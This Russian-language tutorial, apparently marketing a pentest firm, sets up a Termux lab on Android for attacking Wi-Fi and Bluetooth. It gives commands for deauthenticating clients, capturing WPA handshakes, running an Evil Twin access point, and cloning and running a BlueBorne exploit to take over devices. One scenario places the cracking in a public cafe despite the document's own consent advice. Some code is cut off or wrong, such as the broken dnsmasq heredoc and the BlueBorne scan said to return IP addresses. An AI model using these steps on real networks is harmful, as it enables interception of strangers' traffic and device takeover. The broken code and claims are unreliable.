Мобильные устройства обладают мощным набором возможностей, которые часто недооцениваются в сфере информационной безопасности. Termux — это терминальный эмулятор для Android, предоставляющий полноценный Linux‑окружение, что делает его идеальной площадкой для создания лаборатории по исследованию уязвимостей Wi‑Fi и Bluetooth без необходимости в отдельном ноутбуке или виртуальной машине.
Почему именно Termux?
- Полный набор пакетов из репозиториев
aptиpkg. - Поддержка привилегированных операций через
root(при наличии рута) иtsu. - Лёгкая установка и переносимость – достаточно одного смартфона.
- Возможность работать в офлайн‑режиме, что критично для тестов в изолированных сетях.
Подготовка среды
Для начала установим базовые пакеты и подготовим инструменты, необходимые для работы с беспроводными интерфейсами.
# Обновляем репозитории
apt update && apt upgrade -y
# Устанавливаем основные утилиты
apt install -y git wget curl nano
# Устанавливаем набор для работы с Wi‑Fi
apt install -y aircrack-ng iw wireless-tools
# Устанавливаем набор для работы с Bluetooth
apt install -y bluez bluez-tools
# Устанавливаем python и необходимые библиотеки
apt install -y python python-pip
pip install --upgrade scapy
Если ваш телефон имеет root, рекомендуется установить tsu для выполнения команд от имени суперпользователя:
apt install -y tsu
Эмуляция атак на Wi‑Fi
Для исследования уязвимостей Wi‑Fi будем использовать проверенные инструменты из пакета aircrack-ng. Ниже приведены типовые сценарии.
1. Сканирование доступных точек доступа
# Переводим интерфейс в режим мониторинга (пример для wlan0)
iw dev wlan0 interface add mon0 type monitor
ifconfig mon0 up
# Запускаем сканирование
airodump-ng mon0
2. Захват хендшейка WPA/WPA2
# Выбираем BSSID и канал (пример BSSID=AA:BB:CC:DD:EE:FF, CH=6)
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshakes mon0 &
# Запускаем деаутентикацию жертвы (пример клиент 11:22:33:44:55:66)
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 mon0
Полученный файл handshakes-01.cap можно проанализировать локально с помощью hashcat или aircrack-ng.
3. Атака типа Evil Twin
Для создания поддельной точки доступа используется hostapd в сочетании с dnsmasq. Ниже схематичный пример конфигурации.
# Устанавливаем hostapd и dnsmasq
apt install -y hostapd dnsmasq
# Конфиг hostapd (hostapd.conf)
echo "interface=mon0
ssid=FreeWiFi
channel=6
hw_mode=g
auth_algs=1
wpa=2
wpa_passphrase=supersecret
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP" > hostapd.conf
# Запускаем
hostapd hostapd.conf &
# Настраиваем DHCP через dnsmasq
cat > dnsmasq.conf <После запуска поддельной AP уязвимые клиенты могут автоматически подключиться, что позволяет перехватывать их трафик.
Эмуляция атак на Bluetooth
Bluetooth‑устройства часто используются в IoT‑сценариях, где уровень защиты может быть недостаточным. В Termux доступны инструменты bluescanner, bluez и скрипты на Python (Scapy).
1. Сканирование окружающих Bluetooth‑устройств
# Включаем Bluetooth (требуется root)
service bluetooth start
# Сканируем устройства
hcitool scan
2. Перехват и модификация L2CAP пакетов
Для работы с L2CAP можно воспользоваться скриптом на Scapy. Пример простейшего сниффера:
#!/usr/bin/env python3
from scapy.all import *
def pkt_callback(pkt):
if pkt.haslayer(L2CAP_Hdr):
print(pkt.summary())
sniff(iface='hci0', prn=pkt_callback, store=0)
Скрипт необходимо запускать с привилегиями (tsu python3 sniff_bt.py).
3. Атака типа BlueBorne (пример)
Для демонстрации уязвимости BlueBorne используем готовый эксплойт. Важно выполнять его только в изолированной сети.
# Клонируем репозиторий
git clone https://github.com/andrewmichaels/BlueBorne-Exploit.git
cd BlueBorne-Exploit
# Устанавливаем зависимости
pip install -r requirements.txt
# Запускаем сканирование уязвимых устройств
python3 blueborne_scan.py
Полученный список IP‑адресов позволяет далее выполнить blueborne_exploit.py для получения доступа к целевому устройству.
Практические сценарии лаборатории
Для обучения рекомендуется построить несколько типовых сценариев:
- Сценарий 1 – Пентест Wi‑Fi в общественном кафе. С помощью
airodump-ngсобираем информацию, захватываем хендшейк и пытаемся подобрать пароль. - Сценарий 2 – Показ поддельной точки доступа. Создаём Evil Twin, перенаправляем трафик через
mitmproxyи демонстрируем уязвимости в открытых соединениях. - Сценарий 3 – Исследование Bluetooth‑устройств в умном доме. Сканируем IoT‑устройства, проверяем наличие устаревшего профиля
OBEX, проводим L2CAP‑перехват. - Сценарий 4 – Автоматизированный аудит. Пишем скрипт на Python, который комбинирует
airodump-ng,hcitoolиscapyдля одновременного сбора данных о Wi‑Fi и Bluetooth в одной сети.
Все сценарии следует выполнять в изолированной сети (например, в отдельном роутере, не подключённом к Интернету) и только с согласия владельцев целевых устройств.
Этика и правовые аспекты
Любая работа с реальными сетями должна соответствовать законодательству вашей страны и внутренним политикам организации. Рекомендуется:
- Получать письменное разрешение от владельца инфраструктуры.
- Вести журнал всех действий, чтобы обеспечить трассируемость.
- Ограничивать время проведения атак и использовать только тестовые среды.
Помните, что даже в учебных целях, несанкционированный доступ к чужим устройствам является преступлением.
Заключение
Termux предоставляет уникальную возможность превратить Android‑устройство в полноценную лабораторию для изучения уязвимостей Wi‑Fi и Bluetooth. Благодаря открытым инструментам, гибкой конфигурации и мобильности, вы можете отрабатывать навыки пентеста в любой точке мира, не нарушая этических норм.
Если вам требуется более глубинный аудит, разработка кастомных эксплойтов или обучение персонала – обратитесь в RybinskLab. Мы предлагаем услуги по проведению профессионального тестирования беспроводных сетей, построению безопасных лабораторий и подготовке специалистов под ваш бизнес.